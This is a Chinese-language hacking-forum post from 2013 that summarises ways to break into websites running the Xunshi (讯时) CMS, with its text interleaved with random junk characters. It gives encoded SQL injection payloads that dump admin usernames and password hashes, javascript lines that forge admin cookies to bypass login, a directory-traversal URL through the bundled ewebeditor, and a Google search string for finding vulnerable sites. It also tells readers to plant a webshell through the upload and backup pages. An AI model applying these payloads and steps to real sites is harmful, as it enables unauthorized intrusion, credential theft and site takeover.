找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2862|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
( }, z5 f7 `8 v; p7 _* h; Z" U: p7 E9 J/ D+ v& O+ ^% V
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
# z- R& d% I" E7 \, d( p4 {& ]& {% l# |+ T" L  F" o
以下本文总结来自黑防去年第9期杂志上的内容...  J. U/ x3 F' W/ K' ]) b
: X5 a: R! P, O2 H
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%3 e# a2 @" y3 R1 n3 W( k5 D7 R% E" {

9 h6 `2 n* e. @26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 % n: V# t6 z. J0 d# G
/ N6 g0 ~7 ~0 [
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况: m4 n5 R/ |) |8 @* [+ y( o3 \6 _
这里一个注入' A: G" n- N# |8 q0 A& J
+ K& [9 K6 T# t
效果如图:# `( D% L, y" ~8 ]* o+ f
3 i' G, k  a( d9 y! G7 v+ P

: n! b, ?2 o! r2 j% o  q7 x/ R/ ^3 |4 R/ _* \( o. _, c8 x" P! v
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
. x' ~5 t) X' I% R" ]" n: ~# F6 V
- M& A" c7 T. s% i" ?) o9 ]. k密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去6 u8 o5 {) C2 g7 `! N
- l( F" [6 U' S1 w- ^0 P  [2 M
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
, @+ Y7 @: w- y, h3 F( t$ t+ W1 F1 z: Y: q" _
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
3 |/ C- j' K0 w6 V' R) p0 }2 E  p# X  B4 J
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
+ ]$ ?$ i& E  p
7 C1 J  n% s; ~1 E: t/ r: Y它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以; M2 O3 w2 S# {, P

+ R9 o+ R' c/ R- M! R( A4 K访问这页面来列目录..步骤如下:( o9 r2 Y9 ^, \; _" q* R

. {3 C; E* {4 o: }) fjavascript:alert(document.cookie="admindj=1")
' F) Z/ w: V3 K7 P4 [
+ V: Q+ C8 T; F) ohttp://www.political-security.co ... asp?id=46&dir=../..$ ]) U0 M% {  A5 N

+ t, T5 K4 L) V/ X8 D效果如图:% G4 E; T. Q1 a# u& E
( S, \( }- m8 l! P8 f; D$ p. Q
" l9 p( g2 H) O8 {, g

4 n  [0 |( j2 g- V$ M4 ~这样全站目录都能瞧了..找到后台目录..进去..
/ c" w- ?, p7 M$ O5 _- `" ^' r
9 J, Z) t9 I1 u1 r# B) f那么进了后台怎么拿shell??上传--备份就ok了..6 T  {2 R; p' |: E, G
/ @6 x5 d- M1 f3 D) S2 Q: i& c2 E
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..- _: m- l, P  U( C
. |+ t8 z* [: n# V: p& m: x
这个我也碰到过一次..你都可以通过列目录来实现... o; Z+ N$ G: O2 e/ l. P7 n

: n+ o# M0 v* Kjavascript:alert(document.cookie="admindj=1")
; s8 B$ w/ j: t8 K  M9 y
' U7 S: U3 F& q4 P( G3 v! Ghttp://www.political-security.co ... p?action=BackupData
% l* o# n* S# G& E! O1 v2 `' R2 T. l, v& O, R6 y( U1 o' p0 Z" }
备份ok..
/ B1 E, E+ f% u. b  w' s# p
* g6 ~/ G$ G: Z' P/ X* ?9 I  _, s+ c那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
& a* E, x2 P: }) q) @; `/ f& |& m% V
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下3 L  m, M5 V7 W/ y  K6 S- O

$ K; r; S7 S/ k1 z然后访问此页面进行注入..步骤如下:
9 x9 B) f- d5 V7 b1 G: q$ K  z. y6 Z
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")6 v- V0 w0 f- l, e4 w) a- B
/ ^% |/ a7 ]; l4 j! O% m
然后请求admin/admin_chk.asp页面: q) U7 o3 `( W0 j$ m! @

& M9 ?" l$ l& G输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
2 Z8 C- I' j5 M; b( Q- l' s) y, Q1 u2 p  v" J
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
% u: M7 h, A: I  V2 i# Y$ F% j1 S7 T' E7 `% {0 a8 e
效果如图所示:; A8 o9 g! [. ?' R' q9 X2 H* ~

, [! s5 w) j+ G$ ?1 m- ^1 f  X * j7 u3 t8 J7 A3 y4 g* @, X# j
( Y% R7 f& f& \* P- v% Y
讯时漏洞26 J% j$ Y/ t! t& h2 w6 [
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)/ E( E- I& p% Z; q1 t  R# b

1 `" w8 o/ C: s, K/ e1、/admin/admin_news_pl_view.asp?id=1
- a2 l% K- a4 K- @, k0 l//id任意 填入以下语句
4 w; t5 q2 A7 u & ~+ ~& A6 N' R- ?: y
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!0 q7 ^2 r1 j) i( i+ M) `4 m
8 g4 z, d( b/ `- n4 A

1 w* \; m2 \- B& D
3 l1 Z! s8 ?; S) c. T& E1 g- P1 I3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='; m4 `' B3 [7 {3 Z$ ^, D/ e
& i* h  e* @0 i+ X) G- v

# Z# F* `- _% d0 m6 T! i
$ E/ K! v7 `/ U4 _. A4 f爆出管理员帐号和密码了
; p9 L! O. I4 A1 }  e9 Q
' J6 `! l) _% z" a$ \, A$ D0 X$ [( Z! }5 m/ r$ U

2 _+ X& f9 j& L! @8 e4、cookies进后台
) k, e5 l8 P7 }$ V. g , A& L, z2 `. h# ]6 v
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
2 e% N: m) H* |, o! I 5 P. r0 f0 d( {9 I( I

  D: u6 u3 o: d! ^9 q
" I/ D# r! H( r4 P5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
" f9 w8 |1 Q1 C 7 ]: H; x+ x" `

$ Y0 U5 M/ e% z% V8 j+ S# q1 S
) `& k; a: a' L3 p7 a5 {+ p6、后台有上传和备份取SHELL不难。+ Y& l; z5 m5 q
% A9 a9 `$ u( @  J
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..( r$ ?+ d5 ?' S
/ C- V/ x1 h0 s0 S( \6 b
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
3 W9 f! `4 ~* N7 f1 n: d8 J
; u1 F0 b* [0 B: r3 h& m- y- N- t. ?  ~0 v: U; U; K

5 v' |: i' R0 L0 K) X* z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表